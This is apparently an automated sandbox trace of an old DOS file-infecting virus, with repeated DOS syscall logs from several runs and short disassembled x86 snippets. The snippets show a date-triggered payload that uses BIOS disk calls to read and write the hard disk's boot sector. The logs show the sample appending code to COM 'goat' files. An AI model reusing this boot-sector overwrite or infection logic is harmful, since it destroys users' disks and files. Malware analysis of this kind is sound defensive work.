2018-12-25T11:52:08.361584367Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:08.364366183Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:08.370081446Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:08.380659411Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:08.387066602Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:08.38828329Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:08.394873845Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:08.404587942Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:08.406316114Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:08.410081111Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:08.415932916Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:08.42579689Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:08.437909102Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:08.43949426Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:08.446329534Z 66 PC: 143fa | Move file pointer
2018-12-25T11:52:08.448616364Z 63 PC: 14406 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:52:08.451256077Z 66 PC: 1440f | Move file pointer
2018-12-25T11:52:08.452865355Z 66 PC: 1442b | Move file pointer
2018-12-25T11:52:08.455079379Z 63 PC: 14437 | Read file or device (Read 1 bytes on handle 5)
2018-12-25T11:52:08.461742767Z 66 PC: 14453 | Move file pointer
2018-12-25T11:52:08.463538636Z 64 PC: 14461 | Write file or device (Write 2767 bytes on handle 5)
2018-12-25T11:52:08.473083379Z 66 PC: 1446a | Move file pointer
2018-12-25T11:52:08.474230225Z 64 PC: 14476 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:52:08.476566298Z 87 PC: 14480 | Get or set file date and time
2018-12-25T11:52:08.478076969Z 87 PC: 14488 | Get or set file date and time
2018-12-25T11:52:08.479379039Z 62 PC: 1448c | Close file
2018-12-25T11:52:08.485260495Z 67 PC: 14497 | Get or set file attributes
2018-12-25T11:52:08.49557342Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:08.500124163Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:08.501429971Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:08.504286308Z 9 PC: 12a86 | Display string (String= 'Goat file (COM/....). Size=000017D4h/0000006100d bytes. ')
2018-12-25T11:52:08.510495126Z 48 PC: 12a8f | Get DOS version
2018-12-25T11:52:08.511913105Z 61 PC: 12b5c | Open file (Filename = '')
2018-12-25T11:52:08.519384993Z 93 PC: 12afe | File sharing functions
2018-12-25T11:52:08.521820112Z 9 PC: 12a86 | Display string (See above)
2018-12-25T11:52:08.526039533Z 76 PC: 12ae3 | Terminate with return code (Return code = '1')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":9,"Min":0,"Second":0,"TimeBased":true,"OriginalID":4535,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:52:07.978731317Z 48 PC: 14228 | Get DOS version
2018-12-25T11:52:07.980552539Z 44 PC: 14304 | Get time 0x14304: cmp ch, 9
0x14307: jne 0x14310
0x14309: mov ah, 9
0x1430b: mov dx, 0x397
0x1430e: int 0x21
0x14310: mov ah, 0x2c
0x14312: int 0x21
0x14314: cmp ch, 0xf
0x14317: jne 0x14320
0x14319: mov ah, 9
0x1431b: mov dx, 0x397
0x1431e: int 0x21
0x14320: mov ah, 0x2a
0x14322: int 0x21
0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
2018-12-25T11:52:07.982870296Z 9 PC: 14310 | Display string (Could not find end pointer)
2018-12-25T11:52:08.128345209Z 44 PC: 14314 | Get time 0x14314: cmp ch, 0xf
0x14317: jne 0x14320
0x14319: mov ah, 9
0x1431b: mov dx, 0x397
0x1431e: int 0x21
0x14320: mov ah, 0x2a
0x14322: int 0x21
0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
0x14331: mov ah, 3
0x14333: mov al, 1
0x14335: mov dl, 0x80
0x14337: mov dh, 0
0x14339: mov cx, 1
0x1433c: mov bx, 0x41c
0x1433f: int 0x13
2018-12-25T11:52:08.131416345Z 42 PC: 14324 | Get date 0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
0x14331: mov ah, 3
0x14333: mov al, 1
0x14335: mov dl, 0x80
0x14337: mov dh, 0
0x14339: mov cx, 1
0x1433c: mov bx, 0x41c
0x1433f: int 0x13
0x14341: mov ah, 4
0x14343: mov dl, 0x80
0x14345: mov dh, 0
0x14347: mov cx, 1
0x1434a: int 0x13
0x1434c: mov ah, 9
0x1434e: mov dx, 0x3c4
2018-12-25T11:52:08.134233317Z 78 PC: 14390 | Find first file
2018-12-25T11:52:08.141364032Z 67 PC: 1439d | Get or set file attributes
2018-12-25T11:52:08.14843822Z 67 PC: 143a9 | Get or set file attributes
2018-12-25T11:52:08.178875954Z 61 PC: 143ca | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:52:08.186621761Z 87 PC: 143d6 | Get or set file date and time
2018-12-25T11:52:08.188534882Z 63 PC: 143ea | Read file or device (Read 1 bytes on handle 5)
2018-12-25T11:52:08.197603976Z 67 PC: 143b5 | Get or set file attributes
2018-12-25T11:52:08.209465804Z 62 PC: 143b9 | Close file
2018-12-25T11:52:08.212067018Z 79 PC: 143bd | Find next file
2018-12-25T11:52:08.216059623Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:08.222517252Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:08.235312649Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:08.245116097Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:08.247243501Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:08.255074517Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:08.268592086Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:08.270710646Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:08.27362558Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:08.280506695Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:08.294502066Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:08.302372806Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:08.304172646Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:08.312235482Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:08.320100702Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:08.321959611Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:08.324199547Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:08.331781523Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:08.339189474Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:08.344886125Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:08.34603059Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:08.350836454Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:08.358779617Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:08.36033751Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:08.362196995Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:08.367918911Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:08.387908616Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:08.402402454Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:08.40487997Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:08.412159089Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:08.423680849Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:08.426188573Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:08.430355802Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:08.436889032Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:08.447908579Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:08.457157241Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:08.458690701Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:08.466418143Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:08.478586983Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:08.480821366Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:08.483789315Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:08.491129392Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:08.502541592Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:08.510421566Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:08.512720788Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:08.521103054Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:08.535993414Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:08.537866755Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:08.54124122Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:08.548246529Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:08.559992527Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:08.568440482Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:08.571222628Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:08.578840117Z 66 PC: 143fa | Move file pointer
2018-12-25T11:52:08.581136629Z 63 PC: 14406 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:52:08.583948729Z 66 PC: 1440f | Move file pointer
2018-12-25T11:52:08.585377472Z 66 PC: 1442b | Move file pointer
2018-12-25T11:52:08.590325773Z 63 PC: 14437 | Read file or device (Read 1 bytes on handle 5)
2018-12-25T11:52:08.598542515Z 66 PC: 14453 | Move file pointer
2018-12-25T11:52:08.600209228Z 64 PC: 14461 | Write file or device (Write 2767 bytes on handle 5)
2018-12-25T11:52:08.608206203Z 66 PC: 1446a | Move file pointer
2018-12-25T11:52:08.609399008Z 64 PC: 14476 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:52:08.611307624Z 87 PC: 14480 | Get or set file date and time
2018-12-25T11:52:08.612995352Z 87 PC: 14488 | Get or set file date and time
2018-12-25T11:52:08.614617101Z 62 PC: 1448c | Close file
2018-12-25T11:52:08.624279359Z 67 PC: 14497 | Get or set file attributes
2018-12-25T11:52:08.637468946Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:08.643566884Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:08.645752617Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:08.649008364Z 9 PC: 12a86 | Display string (String= 'Goat file (COM/....). Size=000017D4h/0000006100d bytes. ')
2018-12-25T11:52:08.65668742Z 48 PC: 12a8f | Get DOS version
2018-12-25T11:52:08.658213254Z 61 PC: 12b5c | Open file (Filename = '')
2018-12-25T11:52:08.672054271Z 93 PC: 12afe | File sharing functions
2018-12-25T11:52:08.675389418Z 9 PC: 12a86 | Display string (See above)
2018-12-25T11:52:08.679763095Z 76 PC: 12ae3 | Terminate with return code (Return code = '1')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":9,"Min":0,"Second":0,"TimeBased":true,"OriginalID":4535,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T13:06:54.611239599Z 48 PC: 14228 | Get DOS version
2018-12-25T13:06:54.612920766Z 44 PC: 14304 | Get time 0x14304: cmp ch, 9
0x14307: jne 0x14310
0x14309: mov ah, 9
0x1430b: mov dx, 0x397
0x1430e: int 0x21
0x14310: mov ah, 0x2c
0x14312: int 0x21
0x14314: cmp ch, 0xf
0x14317: jne 0x14320
0x14319: mov ah, 9
0x1431b: mov dx, 0x397
0x1431e: int 0x21
0x14320: mov ah, 0x2a
0x14322: int 0x21
0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
2018-12-25T13:06:54.614979035Z 9 PC: 14310 | Display string (Could not find end pointer)
2018-12-25T13:06:54.737129848Z 44 PC: 14314 | Get time 0x14314: cmp ch, 0xf
0x14317: jne 0x14320
0x14319: mov ah, 9
0x1431b: mov dx, 0x397
0x1431e: int 0x21
0x14320: mov ah, 0x2a
0x14322: int 0x21
0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
0x14331: mov ah, 3
0x14333: mov al, 1
0x14335: mov dl, 0x80
0x14337: mov dh, 0
0x14339: mov cx, 1
0x1433c: mov bx, 0x41c
0x1433f: int 0x13
2018-12-25T13:06:54.739595968Z 42 PC: 14324 | Get date 0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
0x14331: mov ah, 3
0x14333: mov al, 1
0x14335: mov dl, 0x80
0x14337: mov dh, 0
0x14339: mov cx, 1
0x1433c: mov bx, 0x41c
0x1433f: int 0x13
0x14341: mov ah, 4
0x14343: mov dl, 0x80
0x14345: mov dh, 0
0x14347: mov cx, 1
0x1434a: int 0x13
0x1434c: mov ah, 9
0x1434e: mov dx, 0x3c4
2018-12-25T13:06:54.741607343Z 78 PC: 14390 | Find first file
2018-12-25T13:06:54.747346912Z 67 PC: 1439d | Get or set file attributes
2018-12-25T13:06:54.754295339Z 67 PC: 143a9 | Get or set file attributes
2018-12-25T13:06:54.768769934Z 61 PC: 143ca | Open file (Filename = 'SLEEP.COM')
2018-12-25T13:06:54.775808836Z 87 PC: 143d6 | Get or set file date and time
2018-12-25T13:06:54.777764764Z 63 PC: 143ea | Read file or device (Read 1 bytes on handle 5)
2018-12-25T13:06:54.78400288Z 67 PC: 143b5 | Get or set file attributes
2018-12-25T13:06:54.793666152Z 62 PC: 143b9 | Close file
2018-12-25T13:06:54.795786629Z 79 PC: 143bd | Find next file
2018-12-25T13:06:54.798275112Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T13:06:54.803651572Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T13:06:54.813471368Z 61 PC: 143ca | Open file (See above)
2018-12-25T13:06:54.819827555Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T13:06:54.821093341Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T13:06:54.827583642Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T13:06:54.840038488Z 62 PC: 143b9 | Close file (See above)
2018-12-25T13:06:54.841852916Z 79 PC: 143bd | Find next file (See above)
2018-12-25T13:06:54.856251855Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T13:06:54.863349599Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T13:06:54.873294956Z 61 PC: 143ca | Open file (See above)
2018-12-25T13:06:54.88031729Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T13:06:54.8818301Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T13:06:54.888111024Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T13:06:54.898555663Z 62 PC: 143b9 | Close file (See above)
2018-12-25T13:06:54.900213352Z 79 PC: 143bd | Find next file (See above)
2018-12-25T13:06:54.90265816Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T13:06:54.913825132Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T13:06:54.923154822Z 61 PC: 143ca | Open file (See above)
2018-12-25T13:06:54.92944206Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T13:06:54.931253331Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T13:06:54.93730523Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T13:06:54.94695639Z 62 PC: 143b9 | Close file (See above)
2018-12-25T13:06:54.94904308Z 79 PC: 143bd | Find next file (See above)
2018-12-25T13:06:54.951501596Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T13:06:54.95687323Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T13:06:54.969146519Z 61 PC: 143ca | Open file (See above)
2018-12-25T13:06:54.976191666Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T13:06:54.977516522Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T13:06:54.984274147Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T13:06:54.993817351Z 62 PC: 143b9 | Close file (See above)
2018-12-25T13:06:54.995411883Z 79 PC: 143bd | Find next file (See above)
2018-12-25T13:06:54.998263858Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T13:06:55.003645304Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T13:06:55.012983269Z 61 PC: 143ca | Open file (See above)
2018-12-25T13:06:55.01998518Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T13:06:55.021351931Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T13:06:55.027398447Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T13:06:55.205921113Z 62 PC: 143b9 | Close file (See above)
2018-12-25T13:06:55.207641966Z 79 PC: 143bd | Find next file (See above)
2018-12-25T13:06:55.210069374Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T13:06:55.216131499Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T13:06:55.383213081Z 61 PC: 143ca | Open file (See above)
2018-12-25T13:06:55.389893921Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T13:06:55.392336883Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T13:06:55.398660728Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T13:06:55.506668772Z 62 PC: 143b9 | Close file (See above)
2018-12-25T13:06:55.509014321Z 79 PC: 143bd | Find next file (See above)
2018-12-25T13:06:55.51154656Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T13:06:55.706160354Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T13:06:55.876074116Z 61 PC: 143ca | Open file (See above)
2018-12-25T13:06:55.882684896Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T13:06:55.883977842Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T13:06:55.890874452Z 66 PC: 143fa | Move file pointer
2018-12-25T13:06:55.892178806Z 63 PC: 14406 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T13:06:55.894572348Z 66 PC: 1440f | Move file pointer
2018-12-25T13:06:55.897388927Z 66 PC: 1442b | Move file pointer
2018-12-25T13:06:55.898716686Z 63 PC: 14437 | Read file or device (Read 1 bytes on handle 5)
2018-12-25T13:06:55.905102523Z 66 PC: 14453 | Move file pointer
2018-12-25T13:06:55.906547783Z 64 PC: 14461 | Write file or device (Write 2767 bytes on handle 5)
2018-12-25T13:06:56.123968821Z 66 PC: 1446a | Move file pointer
2018-12-25T13:06:56.125762985Z 64 PC: 14476 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T13:06:56.129108683Z 87 PC: 14480 | Get or set file date and time
2018-12-25T13:06:56.13182672Z 87 PC: 14488 | Get or set file date and time
2018-12-25T13:06:56.134122064Z 62 PC: 1448c | Close file
2018-12-25T13:06:56.244179647Z 67 PC: 14497 | Get or set file attributes
2018-12-25T13:06:56.430221691Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T13:06:56.433461832Z 62 PC: 143b9 | Close file (See above)
2018-12-25T13:06:56.434500183Z 79 PC: 143bd | Find next file (See above)
2018-12-25T13:06:56.436576984Z 9 PC: 12a86 | Display string (String= 'Goat file (COM/....). Size=000017D4h/0000006100d bytes. ')
2018-12-25T13:06:56.439661346Z 48 PC: 12a8f | Get DOS version
2018-12-25T13:06:56.440467699Z 61 PC: 12b5c | Open file (Filename = '')
2018-12-25T13:06:56.444534365Z 93 PC: 12afe | File sharing functions
2018-12-25T13:06:56.445679518Z 9 PC: 12a86 | Display string (See above)
2018-12-25T13:06:56.449087991Z 76 PC: 12ae3 | Terminate with return code (Return code = '1')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":4535,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:52:08.104589503Z 48 PC: 14228 | Get DOS version
2018-12-25T11:52:08.106534088Z 44 PC: 14304 | Get time 0x14304: cmp ch, 9
0x14307: jne 0x14310
0x14309: mov ah, 9
0x1430b: mov dx, 0x397
0x1430e: int 0x21
0x14310: mov ah, 0x2c
0x14312: int 0x21
0x14314: cmp ch, 0xf
0x14317: jne 0x14320
0x14319: mov ah, 9
0x1431b: mov dx, 0x397
0x1431e: int 0x21
0x14320: mov ah, 0x2a
0x14322: int 0x21
0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
2018-12-25T11:52:08.108785207Z 44 PC: 14314 | Get time 0x14314: cmp ch, 0xf
0x14317: jne 0x14320
0x14319: mov ah, 9
0x1431b: mov dx, 0x397
0x1431e: int 0x21
0x14320: mov ah, 0x2a
0x14322: int 0x21
0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
0x14331: mov ah, 3
0x14333: mov al, 1
0x14335: mov dl, 0x80
0x14337: mov dh, 0
0x14339: mov cx, 1
0x1433c: mov bx, 0x41c
0x1433f: int 0x13
2018-12-25T11:52:08.110962202Z 42 PC: 14324 | Get date 0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
0x14331: mov ah, 3
0x14333: mov al, 1
0x14335: mov dl, 0x80
0x14337: mov dh, 0
0x14339: mov cx, 1
0x1433c: mov bx, 0x41c
0x1433f: int 0x13
0x14341: mov ah, 4
0x14343: mov dl, 0x80
0x14345: mov dh, 0
0x14347: mov cx, 1
0x1434a: int 0x13
0x1434c: mov ah, 9
0x1434e: mov dx, 0x3c4
2018-12-25T11:52:08.113588056Z 78 PC: 14390 | Find first file
2018-12-25T11:52:08.12053327Z 67 PC: 1439d | Get or set file attributes
2018-12-25T11:52:08.126655324Z 67 PC: 143a9 | Get or set file attributes
2018-12-25T11:52:08.145830801Z 61 PC: 143ca | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:52:08.154146286Z 87 PC: 143d6 | Get or set file date and time
2018-12-25T11:52:08.155585291Z 63 PC: 143ea | Read file or device (Read 1 bytes on handle 5)
2018-12-25T11:52:08.162752133Z 67 PC: 143b5 | Get or set file attributes
2018-12-25T11:52:08.177891828Z 62 PC: 143b9 | Close file
2018-12-25T11:52:08.179825983Z 79 PC: 143bd | Find next file
2018-12-25T11:52:08.182653417Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:08.191153711Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:08.202182173Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:08.209624694Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:08.216241478Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:08.223788181Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:08.235862728Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:08.240901914Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:08.243957402Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:08.249730199Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:08.264103325Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:08.271865865Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:08.273404641Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:08.284112553Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:08.320716784Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:08.32347128Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:08.32947241Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:08.336817181Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:08.348027242Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:08.356815263Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:08.369662416Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:08.377453896Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:08.390171405Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:08.393542029Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:08.396900334Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:08.403713792Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:08.424998332Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:08.432966278Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:08.43449978Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:08.440913975Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:08.448320126Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:08.449877041Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:08.451978247Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:08.45661813Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:08.465743439Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:08.47168278Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:08.474148655Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:08.479537384Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:08.494179414Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:08.497381392Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:08.505309673Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:08.511727846Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:08.524690638Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:08.532965952Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:08.534984893Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:08.54282653Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:08.555034325Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:08.557962002Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:08.560959698Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:08.575672756Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:08.586714226Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:08.594571328Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:08.597797638Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:08.605773009Z 66 PC: 143fa | Move file pointer
2018-12-25T11:52:08.607587689Z 63 PC: 14406 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:52:08.612390318Z 66 PC: 1440f | Move file pointer
2018-12-25T11:52:08.614680984Z 66 PC: 1442b | Move file pointer
2018-12-25T11:52:08.616718824Z 63 PC: 14437 | Read file or device (Read 1 bytes on handle 5)
2018-12-25T11:52:08.625612867Z 66 PC: 14453 | Move file pointer
2018-12-25T11:52:08.627475286Z 64 PC: 14461 | Write file or device (Write 2767 bytes on handle 5)
2018-12-25T11:52:08.63728244Z 66 PC: 1446a | Move file pointer
2018-12-25T11:52:08.639567852Z 64 PC: 14476 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:52:08.644262602Z 87 PC: 14480 | Get or set file date and time
2018-12-25T11:52:08.646298102Z 87 PC: 14488 | Get or set file date and time
2018-12-25T11:52:08.648459122Z 62 PC: 1448c | Close file
2018-12-25T11:52:08.660052143Z 67 PC: 14497 | Get or set file attributes
2018-12-25T11:52:08.677378686Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:08.682599558Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:08.685129268Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:08.687879135Z 9 PC: 12a86 | Display string (String= 'Goat file (COM/....). Size=000017D4h/0000006100d bytes. ')
2018-12-25T11:52:08.694810187Z 48 PC: 12a8f | Get DOS version
2018-12-25T11:52:08.697465336Z 61 PC: 12b5c | Open file (Filename = '')
2018-12-25T11:52:08.704596919Z 93 PC: 12afe | File sharing functions
2018-12-25T11:52:08.706767346Z 9 PC: 12a86 | Display string (See above)
